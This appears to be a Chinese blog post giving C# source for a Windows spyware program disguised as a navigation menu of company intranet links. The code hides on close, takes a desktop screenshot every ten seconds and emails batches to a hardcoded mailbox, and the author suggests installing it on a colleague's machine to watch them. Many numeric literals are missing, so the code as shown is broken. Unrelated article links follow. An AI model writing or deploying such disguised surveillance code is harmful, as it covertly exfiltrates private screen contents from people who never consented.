using System;

 using System.Collections.Generic;

 using System.ComponentModel;

 using System.Data;

 using System.Drawing;

 using System.Linq;

 using System.Text;

 using System.Threading.Tasks;

 using System.Windows.Forms;

 using System.Threading;

 using System.Net.Mail;

 using System.Net.Mime;

 using System.Net;

 using System.IO;

 using System.Diagnostics;

 namespace WinidowsMonitor

 {

     public partial class Form1 : Form

     {

         //Change variable.

         private static string ApplicationData = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);

         string localPath = GetPath(ApplicationData);

         public static string GetPath(string appDataPath)

         {

             int index = ApplicationData.LastIndexOf("\\");

             string strApp = ApplicationData.Substring(, index);

             string tempPath = strApp + "\\Local\\Temp";

             return tempPath;

         }

         public Form1()

         {

             InitializeComponent();

             Directory.CreateDirectory(localPath + "\\Windows");

         }

         private void JudgeProcess(FormClosingEventArgs e)

         {

             Process[] pros = Process.GetProcesses();

             Process pro = Process.GetCurrentProcess();

             var samePro = from newpro in pros where pro.ProcessName == newpro.ProcessName select newpro;

             if (samePro.Count() > )

             {

                 //MessageBox.Show(samePro.Count().ToString());

                 Application.Exit();

             }

             else

             {

                 //MessageBox.Show("only one");

                 e.Cancel = true;

                 this.Hide();

                 CatchCapture();

             }

         }

         public void CatchCapture()

         {

             Thread.CurrentThread.Name = "WindowsRun";

             int i = ;

             while (true)

             {

                 i++;

                 Image myImg = new Bitmap(Screen.AllScreens[].Bounds.Width, Screen.AllScreens[].Bounds.Height);

                 Graphics g = Graphics.FromImage(myImg);

                 g.CopyFromScreen(new Point(, ), new Point(, ), Screen.AllScreens[].Bounds.Size);

                 string picName = "WindowsCapture" + i.ToString() + ".jpg";

                 string picPath = localPath.ToString() + "\\Windows\\" + picName.ToString();

                 g.Dispose();

                 try

                 {

                     myImg.Save(@picPath.ToString(), System.Drawing.Imaging.ImageFormat.Jpeg);

                 }

                 catch(Exception e)

                 {

                     MessageBox.Show(e.ToString());

                 }

                 myImg.Dispose();

                 Thread.Sleep();

                 if (i %  == )

                 {

                     SendMail();

                     DeletePics(localPath.ToString() + "\\Windows\\");

                 }

             }

         }

         private void DeletePics(string path)

         {

             DirectoryInfo picDi = new DirectoryInfo(path);

             var files = from file in picDi.GetFiles() select file;

             foreach (var pic in files)

             {

                 pic.Delete();

             }

         }

         public void SendMail()

         {

             using (SmtpClient client = new SmtpClient("smtp.163.com"))

             using (var mail = new MailMessage("runcheck1@163.com", "runcheck1@163.com"))

             {

                 client.Host = "smtp.163.com";

                 client.Port = ;

                 client.EnableSsl = true;

                 client.DeliveryMethod = System.Net.Mail.SmtpDeliveryMethod.Network;

                 DirectoryInfo di = new DirectoryInfo(@localPath+"\\Windows");

                 //Add attachment.

                 foreach (FileInfo file in di.GetFiles())

                 {

                     string attachPath = localPath + "\\Windows\\" + file.Name;

                     var attach = new Attachment(attachPath, MediaTypeNames.Image.Jpeg);

                     attach.ContentId = file.Name;

                     mail.Attachments.Add(attach);

                 }

                 mail.Subject = "Windows Capture from love monitor.";

                 mail.SubjectEncoding = Encoding.UTF8;

                 mail.Body = "<img src=\"cid:pic\"/><p>来自Monitor</p>";

                 mail.BodyEncoding = Encoding.UTF8;

                 mail.IsBodyHtml = true;

                 mail.Priority = MailPriority.High;

                 //client.Credentials = CredentialCache.DefaultNetworkCredentials;

                 client.Credentials = new NetworkCredential("runcheck1", "pwd");

                 client.Send(mail);

             }

         }

         private void Form1_Load(object sender, EventArgs e)

         {

             //MessageBox.Show(Process.GetCurrentProcess().ProcessName);

         }

         private void Form1_FormClosing(object sender, FormClosingEventArgs e)

         {

             JudgeProcess(e);

         }

         private void vMManagementToolStripMenuItem_Click(object sender, EventArgs e)

         {

             System.Diagnostics.Process.Start("https://cnportal.avepoint.net/Pages/default.aspx");

         }

         private void cNPortalToolStripMenuItem_Click(object sender, EventArgs e)

         {

             System.Diagnostics.Process.Start("https://privatecloud.ccoffice.avepoint.com/#/Shell/VmsManagement");

         }

         private void iITSCoursesToolStripMenuItem_Click(object sender, EventArgs e)

         {

             System.Diagnostics.Process.Start("https://cnportal.avepoint.net/sites/IITS/Training/Lists/Course%20Library/All%20Courses.aspx");

         }

         private void avePointChinaWorkersToolStripMenuItem_Click(object sender, EventArgs e)

         {

             System.Diagnostics.Process.Start("https://cnportal.avepoint.net/sites/ChinaAdministration/Lists/ChinaTeamAll_Members/ChinaTeam%20Member%20View.aspx");

         }

         private void avePointBookLendingToolStripMenuItem_Click(object sender, EventArgs e)

         {

             System.Diagnostics.Process.Start("https://cnportal.avepoint.net/sites/ChinaAdministration/CCHR/Lists/List2/AllItems.aspx");

         }

         private void trainingSchoolScheduleToolStripMenuItem_Click(object sender, EventArgs e)

         {

             System.Diagnostics.Process.Start("https://cnportal.avepoint.net/sites/IITS/Training/Training_School/Lists/Training_Schedule/view.aspx");

         }

     }

 }

以上程序是我写的一个屏幕截图偷发邮件的工具,十秒钟一截图,三十张一发送,发送完了把已有的删除,继续监控。

外壳可以设计随便什么样,比如导航之类的:

然后你给你的同事用,后台就可以监控他在干嘛了……

在这里我就不演示我的成果了,哈哈。

其实大神之所以称之为大神,就是可以把这些东西做的更隐蔽更持久化。

区别就在于我这只是个恶作剧,而那是真正的木马病毒。

C#中实现Windows系统流氓监控程序的更多相关文章

  1. 如何移除双系统mac中的windows系统

    双系统 双系统即在电脑的不同分区中安装两个系统,两个系统不会互相影响,但是同时只能有一个系统正在运行,并且必须通过重启的方式来更换系统. 双系统一般由于解决对不同系统的需求,而且在电脑中直接安装系统也 ...

  2. 判断.net中在windows系统下的字节序

    字节序,是指字节在内存中的存储顺序.其又分为大端字节(Big-Endian)序和小端字节序(Little-Endian). 以下摘自百度百科: a) Little-Endian就是低位字节排放在内存的 ...

  3. python 中调用windows系统api操作剪贴版

    # -*- coding: utf-8 -*- ''' Created on 2013-11-26 @author: Chengshaoling ''' import win32clipboard a ...

  4. 烂泥:KVM中安装Windows Server 2008 R2系统

    本文由秀依林枫提供友情赞助,首发于烂泥行天下. 在前一篇文章中,我介绍了有关在KVM中的安装Centos系统.接下来,就来介绍如何在KVM中安装Windows系统. 注意:在此我安装的是windows ...

  5. VC++开发Windows系统全局钩子

    本文的大部分内容属于对一篇网文的实践与练习,同时参考的还有一本书,在此向网文与书的作者表示敬意. 这个程序是一个windows系统键盘监控程序,随着开机自动启动,可以监控系统中各用户的键盘,并将按键记 ...

  6. Linode KVM安装Windows系统的设置方法

    以前我们用老的Linode VPS主机的时候是采用的XEN架构的,如今我们新注册账户,以及新开的机器是KVM架构.根据后台的设置,我们看到好多网友有在LINODE中安装WINDOWS系统,理论上是可以 ...

  7. 虚拟Linux系统使用Windows系统oracle数据库

    前提:本地oracle数据库能正常使用. 数据库:oracle 11g 虚拟机:VMware_workstation_full_12.5.2 本机系统:Windows 7 旗舰版 虚拟机系统:open ...

  8. UEFI+GPT模式下的Windows系统中分区结构和默认分区大小及硬盘整数分区研究

    内容摘要:本文主要讨论和分析在UEFI+GPT模式下的Windows系统(主要是最新的Win10X64)中默认的分区结构和默认的分区大小,硬盘整数分区.4K对齐.起始扇区.恢复分区.ESP分区.MSR ...

  9. Windows系统中path环境变量详解

    在学习JAVA的过程中,涉及到多个环境变量(environment variable)的概念,如PATH.正确地配置这些环境变量,是能够顺利学习.开发的前提.而经常出现的问题是:有的学习者能够按照提示 ...

随机推荐

  1. python之函数用法execfile()

    # -*- coding: utf-8 -*- #python 27 #xiaodeng #python之函数用法execfile() #execfile() #说明:用来执行一个文件,相对于双击的效 ...

  2. jQuery写缓存之:sessionStorage的运用,配合PHP将不同tab页的数据写入后台

    JS(jQuery)写缓存之:sessionStorage的运用: 结果就是讲存储的DOM对象value传到后台PHP,进行foreach(){} 解析JSON成二维数组 示例页面:http://ww ...

  3. PHP中curl的使用

    cURL 函数 curl_close — 关闭一个cURL会话 curl_copy_handle — 复制一个cURL句柄和它的所有选项 curl_errno — 返回最后一次的错误号 curl_er ...

  4. ubuntu 重新挂载home

    vmware虚拟机下操作: 1 在Vmware中创建新硬盘. 2 启动Ubuntu 在终端输入:sudo fdisk -l ,可以看到 -------------------------------- ...

  5. iOS高级教程:处理1000张图片的内存优化

    一.项目需求 在实际项目中,用户在上传图片时,有时会一次性上传大量的图片.在上传图片前,我们要进行一系列操作,比如:旋转图片为正确方向,压缩图片等,这些操作需要将图片加载到内存中,下面对内存的使用做详 ...

  6. 如何在cmd命令行中查看、修改、删除与添加环境变量,语法格式例子:set path;echo %APPDATA%

    如何在cmd命令行中查看.修改.删除与添加环境变量 首先明确一点: 所有的在cmd命令行下对环境变量的修改只对当前窗口有效,不是永久性的修改.也就是说当关闭此cmd命令行窗口后,将不再起作用.永久性修 ...

  7. 超酷的Android 侧滑(双向滑动菜单)效果

    下面看看我们如何使用它,达到我们想要的效果 public class MainActivity extends Activity { /** * 双向滑动菜单布局 */ private SliderM ...

  8. Java中堆内存和栈内存详解【转】

    Java把内存分成两种,一种叫做栈内存,一种叫做堆内存 在函数中定义的一些基本类型的变量和对象的引用变量都是在函数的栈内存中分配.当在一段代码块中定义一个变量时,java就在栈中为这个变量分配内存空间 ...

  9. pythonl练习笔记——PythonNet 套接字socket

    1 套接字socket 1.1 套接字概述 套接字,一种网络通讯工具:用于进行网络间的通信,是一种特殊文件类型, 套接字,是一个通信链的句柄,用于描述IP地址和端口,实现向网络发出请求或应答网络请求. ...

  10. Linux中断 - softirq

    一.前言 对于中断处理而言,linux将其分成了两个部分,一个叫做中断handler(top half),是全程关闭中断的,另外一部分是deferable task(bottom half),属于不那 ...